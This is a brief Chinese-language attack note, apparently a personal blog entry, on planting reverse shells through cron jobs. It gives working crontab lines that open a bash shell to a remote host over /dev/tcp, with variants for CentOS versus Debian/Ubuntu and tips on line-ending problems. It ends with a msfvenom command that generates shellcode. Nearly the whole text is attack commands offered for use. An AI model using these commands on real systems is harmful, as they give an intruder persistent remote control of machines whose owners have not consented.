反弹shell的一些东西
反弹shell 格式问题
在写计划任务反弹shell的时候VPS如果是centos那么直接写
*/1 * * * * root bash -i >& /dev/tcp/IP/666 0>&1
但是在实际测试中debian和ubuntu系统这样写是执行不了的,
需要加上 bash -c " "
*/1 * * * * root bash -c "bash -i >& /dev/tcp/IP/666 0>&1"
这样就能执行,成功反弹shell了
当然有时候会出现写进去的定时任务死活不执行,弹不过来
可能是换行问题,但很大可能我觉得是:
这个文件是在windows写的 ,而宿主机是linux系统,那么这时候就在linux上写好文件直接传到宿主机 这样就能成功执行了!(亲测linux下写的命令有换行也能反弹)
msf生成攻击命令
msfvenom -p windows/exec CMD = calc.exe EXITFUNC=thread -f c